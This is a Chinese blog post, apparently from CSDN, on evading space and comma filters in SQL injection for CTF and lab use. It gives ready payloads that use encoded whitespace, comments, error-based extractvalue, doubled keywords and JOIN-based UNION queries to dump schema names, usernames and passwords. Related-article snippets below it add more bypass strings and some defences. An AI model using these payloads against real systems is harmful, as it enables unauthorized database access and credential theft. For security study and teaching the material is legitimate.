SQL注入中空格与逗号过滤的绕过技巧总结

最新推荐文章于 2025-10-18 18:12:02 发布
原创 最新推荐文章于 2025-10-18 18:12:02 发布 · 2.5k 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #sql

大家好,今天想和大家分享一些实用的技巧,专门针对渗透测试或CTF比赛中可能遇到的特殊字符过滤问题。这篇文章主要讲解当遇到空格和逗号过滤时,如何巧妙地进行绕过,让我们的SQL注入成功执行。

一、空格过滤绕过技巧

当目标网站或靶场环境中过滤了空格字符后,我们可以使用以下几种方式来绕过限制:

  • 使用+号替代空格:例如,union+select+1,2,3
  • URL编码替代:%20(空格)、%09(水平制表符HT)、%0A(换行符LF)、%0C(换页符FF)、%0D(回车CR)、%0B(垂直制表符VT)、%A0(不间断空格NBS)。
  • 使用SQL注释符/**/替代空格,如:union/**/select
  • 括号()替代空格:select(database())
  • 使用报错注入技巧绕过限制。

实战案例

%A0为例(此方法适用于Linux环境):

?id=-1'%A0union%A0select%A01,database(),3%A0anandd%A0'1'='1

再举一个利用报错注入的案例:

?id=1'||extractvalue(1,concat('^',(database())))||'1'='1

其中,extractvalue() 函数配合concat()可引发报错,帮助我们绕过字符过滤并获取数据。尤其注意到在过滤了or的情况下,我们还可以通过对关键字进行复写(如将information_schema改为infoorrmation_schema)来绕过过滤。

二、逗号过滤绕过技巧

当逗号被过滤掉时,我们可使用join关键字进行绕过,巧妙利用SQL的表连接特性完成查询。

常规逗号查询方式

select u.*,e.* from users u, emails e where u.id=e.id;

  • • u.*e.*表示:u表中的所有的列和e表中所有的列

  • • users uemails e表示:users表的别名为u表;emails表的别名为e

  • • u.id=e.id表示:两张表相同的字段进行关联

使用join内联进行绕过

select u.*,e.* from users u join emails e on u.id=e.id;

  • • u.*e.*表示:u表中的所有的列和e表中所有的列

  • • users uemails e表示:users表的别名为u表;emails表的别名为e

  • • join users on emails表示:将users表和emails表进行内联,on用于条件限定

实战案例

原本的逗号查询:

select * from users where id = 1 union select 1,2,3;

join代替后的语句为:

select * from users where id = 1
union
select * from (select 1)a join(select 2)b join(select 3)c;

具体含义:

  • (select 1)a:别名为a
  • (select 2)b:别名为b,使用join连接a
  • (select 3)c:别名为c,同理连接

实操演示

当靶场环境明确过滤逗号时,可如此绕过:

查询当前数据库名:

?id=-1' union select * from (select 1)a join(select database())b join(select 3)c --+

查询表名(注意绕过过滤的关键字复写技巧):

?id=-1' union select * from (select 1)a
join(select group_concat(table_name) from infoorrmation_schema.tables where table_schema=(select database()))b
join(select 3)c --+

查询列名:

?id=-1' union select * from (select 1)a
join(select group_concat(column_name) from infoorrmation_schema.columns where table_schema=(select database()) anandd table_name = 'users')b
join(select 3)c --+

 

查询用户信息(用户名与密码):

# 查询用户名
?id=-1' union select * from (select 1)a
join(select group_concat(username) from users)b
join(select 3)c --+

# 查询密码
?id=-1' union select * from (select 1)a
join(select group_concat(passwoorrd) from users)b
join(select 3)c --+

 

三、小结

以上技巧的掌握,在日常渗透测试以及CTF挑战中都会大有帮助。希望大家通过这篇文章对空格与逗号的过滤绕过技巧有更深入的理解和实践。感谢阅读!

免费备考资料分享(红帽、甲骨文、华为)

为了帮助更多考生高效备考,我根据自己的学习经验,整理了以下几个核心备考资料:

  1. 考试大纲
    覆盖HCIE笔试和实验考试的所有重点知识,帮助你精准掌握考试范围,避免盲目学习。

  2. 培训教材
    详细的理论知识和案例分析,核心技术的深入解析,是夯实基础的不二之选。

  3. 实验手册
    实验考试配置命令速查手册和模拟实验案例集,涵盖关键场景,助你在实验环节高效应对。

获取方式
如果你需要这些备考资料,可以在评论区留言或者私信我,我会将资料打包发给你,希望对你的备考有所帮助!

23-4 绕过过滤空格SQL 注入
weixin_43263566的博客
02-05 978
在深入了解SQL注入数据库安全话题之前,掌握一些MySQL数据库的基础知识是很重要的。
sql注入-绕过过滤空格
MichealCurry1的博客
10-09 3327
空格可以用/**/,%20替换
深入浅出:SQL注入中的逗号绕过技巧剖析
最新发布
haishiqiguai的博客,欢迎你的到来,希望你能在此找到汝心中所求
10-18 1155
本篇文章深入剖析了在SQL注入中当逗号过滤时,如何利用JOIN、FROM ... FOR、LIMIT OFFSET和CASE WHEN等语法技巧绕过限制,继续实施攻击,并给出了实战示例防御建议
SQL-labs的第26关——空格和注释被过滤 报错注入(Get)
qq_73393033的博客
08-04 929
我们可以确定'号就是该网站的闭合符号。'号可能是闭合方式。
Web安全之SQL注入绕过技巧
m0_74131821的博客
04-11 1931
今天跟大家聊聊SQL注入的几种绕过技巧
SQL注入绕过空格
nihao_ma_的博客
05-07 2571
SQL注入空格绕过技巧
mysql 关键词绕过_SQL注入绕过技巧
weixin_42416119的博客
01-19 1154
1.绕过空格(注释符/* */,%a0):两个空格代替一个空格,用Tab代替空格,%a0=空格:%20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/最基本的绕过方法,用注释替换空格:/*注释*/使用浮点数:select * from users where id=8E0union select 1,2,3select * from users where id=8...
SQL注入绕过技巧总结
09-09
总结来说,SQL注入绕过技术需要根据目标系统的具体过滤规则来灵活应用。随着安全技术的发展,虽然SQL注入已不像以前那样普遍,但仍然存在很多未修补的漏洞。因此,开发人员应始终确保对用户输入进行充分验证和过滤,...
SQL注入绕过技巧
2301_77160226的博客
06-10 3873
SQL注入绕过技巧
渗透测试-百日筑基—SQL注入篇&时间注入&绕过&HTTP数据编码&绕过—下
LANDUOSHUREN的博客
10-25 1588
SQL 注入绕过技术 已经是一个老生常谈的内容了,防注入可以使用某些云 waf加速乐等安全产品,这些产品会自带 waf 属性拦截和抵御 SQL 注入,也有一些产品会在服务器里安装软件,例如 iis 安全狗、d 盾、还有就是在程序里对输入参数进行过滤和拦截 例如 360webscan 脚本等只要参数传入的时候就会进行检测,检测到有危害语句就会拦截。但是在日渐成熟的 waf 产品面前,因为 waf 产品的规则越来越完善,所以防御就会越来越高,安全系统也跟着提高,对渗透测试而言,测试的难度就越来越高了。
sql注入中各种waf的绕过方式,狗,盾,神,锁,宝
Lucker_YYY的博客
10-01 1704
当我们遇到一个waf时,要确定是什么类型的?先来看看主流的这些waf,狗、盾、神、锁、宝、卫士等等。。。(在测试时不要只在官网测试,因为存在版本差异导致规则库并不一致)在配置云waf时(通常是CDN包含的waf),DNS需要解析到CDN的ip上去,在请求uri时,数据包就会先经过云waf进行检测,如果通过再将数据包流给主机。在主机上预先安装了这种防护软件,可用于扫描和保护主机(废话),和监听web端口的流量是否有恶意的,所以这种从功能上讲较为全面。
sql注入绕过+rce
qq_64951792的博客
08-12 1607
RCE基础、SQL注入绕过
【网络安全】SQL注入绕过技巧
Cairo_A的博客
12-08 1295
在使用盲注的时候,需要使用到substr(),mid(),limit。or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。而括号的两端,可以没有多余的空格。(2)将 \' 中的 \ 过滤掉,例如可以构造 %**%5c%5c%27 ,后面的 %5c 会被前面的 %5c 注释掉。
sql注入常见绕过方法
ljlrookiebird的博客
09-05 6619
sql注入是web安全的常见漏洞,这里总结下常见的绕过姿势,还有其他没总结到了,小伙伴可以留言补充
CTFhub-sql注入-绕过空格过滤
ssss39的博客
08-19 710
如果1/**/union/**/select/**/1=1的显示结果1/**/union/**/select/**/1=2的显示结果不一样,1/**/union/**/select/**/1,2 没有将数据带出来。3 没有回显,说明只用 1,2 这两个。1的结果一样说明存在注入点。字段名dzkctujmta。
sql注入绕过空格过滤
一只菜鸟的博客
10-31 6959
SQL注入时,空格的使用是非常普遍的。比如,我们使用union来取得目标数据: http://www.xxx.com/index.php?id=1 and 0 union select null,null,null 上面的语句,在and两侧、union两侧、select的两侧,都需要空格。 1. 注释绕过空格 这是最基本的方法,在一些自动化SQL注射工具中,使用也十分普遍。在MySQL中,用 /*注释*/ 来标记注释的内容。比如SQL查询: select user() from dual 我们用注释替换空格
SQL注入逗号绕过
weixin_42478365的博客
05-03 1210
1.联合查询显注绕过逗号 在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7…n 这样的格式爆显示位,语句中包含了多个逗号,如果有WAF拦截了逗号时,我们的联合查询不能用了。 绕过 在显示位上替换为常见的注入变量或其它语句 union select 1,2,3; union select * from ((select 1)A join (select 2)B join (select 3)C); union select * from ((select 1)A join (sele
SQL注入实战:mysql绕过
moyuan_4s的博客
08-11 2013
(1)greatest(n1,n2,n3,...) //返回其中的最大值 (2)strcmp(str1,str2) //当str1=str2,返回0,当str1>str2,返回1,当str1
sql注入空格过滤
03-14
<think>好的,我现在需要帮助用户解决关于SQL注入空格过滤的问题。用户想知道如何绕过空格过滤以及相应的防护方法。首先,我得回忆一下常见的绕过空格过滤的技术,以及如何防护这些攻击。 用户提到当输入`?id=1 or 1=1#`时出现错误,说明可能有空格过滤。这时候攻击者通常会尝试用其他字符代替空格,比如TAB、注释符或者URL编码。比如用`%09`代替空格,或者在关键字之间插入注释如`/**/`。这些都是常见的绕过方法。 接下来要考虑如何防护这些绕过手段。防护措施应该包括输入验证、使用参数化查询、过滤或转义特殊字符,以及使用Web应用防火墙(WAF)。比如,参数化查询可以有效防止注入,因为用户输入不会被解释为SQL代码。同时,过滤或替换所有可能的空格替代字符也很重要,比如TAB、换行符等。 还需要参考用户提供的引用资料,特别是引用[2]提到用TAB代替空格,引用[4]中的过滤方法,以及引用[5]中的例子。这些资料支持提到的绕过技术和防护措施。比如,引用[4]提到replace函数过滤反斜杠和引号,可以应用到过滤其他字符的情况。 最后要确保回答结构清晰,分点说明绕过方法和防护措施,并附上相关问题。同时,引用需要正确标注,比如在提到使用TAB绕过时引用[2],在过滤特殊字符时引用[4]。</think>### SQL注入空格过滤的应对方法 #### 一、绕过空格过滤的技术 当应用程序过滤空格字符时,攻击者可以采用以下替代方案构造有效载荷: 1. **TAB键替代** 使用`%09`(URL编码的TAB字符)代替空格: ```sql ?id=1%09union%09select%091,version(),3--+ ``` [^2] 2. **注释符插入** 在关键字之间插入`/**/`(MySQL支持的注释语法): ```sql ?id=1/**/union/**/select/**/1,@@version,3--+ ``` 3. **括号包裹法** 通过括号结构替代空格分隔: ```sql ?id=(select(version())from(users)) ``` 4. **URL编码混淆** 使用双重编码或非标准编码: ```sql ?id=1%25A0union%25A0select%25A01,2,3--+ (空格编码为%A0) ``` 5. **换行符替代** 利用`%0A`或`%0D`实现分隔: ```sql ?id=1%0Aunion%0Aselect%0A1,2,3--+ ``` #### 二、防护措施 1. **参数化查询** 使用预编译语句(如`PreparedStatement`),确保输入数据始终作为参数处理: ```java String sql = "SELECT * FROM users WHERE id = ?"; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setInt(1, userId); ``` [^3] 2. **严格输入过滤** * 正则表达式过滤所有空白字符(包括`\s`匹配的空格、TAB、换行符) * 替换特殊字符编码:`%09`→空值、`/**/`→空值 * 示例过滤函数: ```python def sanitize(input): return re.sub(r'[\s%0A%0D%09]|(\/\*.*\*\/)', '', input) ``` [^4] 3. **白名单验证** 对数字型参数强制类型转换: ```php $id = (int)$_GET['id']; ``` 4. **多层防护体系** * 应用层:启用ORM框架的自动转义功能 * 数据库层:设置`mysql_real_escape_string()` * 网络层:部署WAF规则拦截非常规空白符请求 5. **错误信息屏蔽** 配置自定义错误页面,避免暴露数据库结构信息: ```xml <!-- in web.xml --> <error-page> <error-code>500</error-code> <location>/error.jsp</location> </error-page> ``` #### 三、技术验证流程 当发现可能存在注入漏洞时,应按照以下步骤测试防护有效性: 1. 发送含`%09`的测试请求 2. 尝试使用括号结构构造查询 3. 验证是否返回标准化错误信息 4. 检查数据库日志是否记录异常语句 5. 使用自动化工具(如sqlmap)进行模糊测试
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值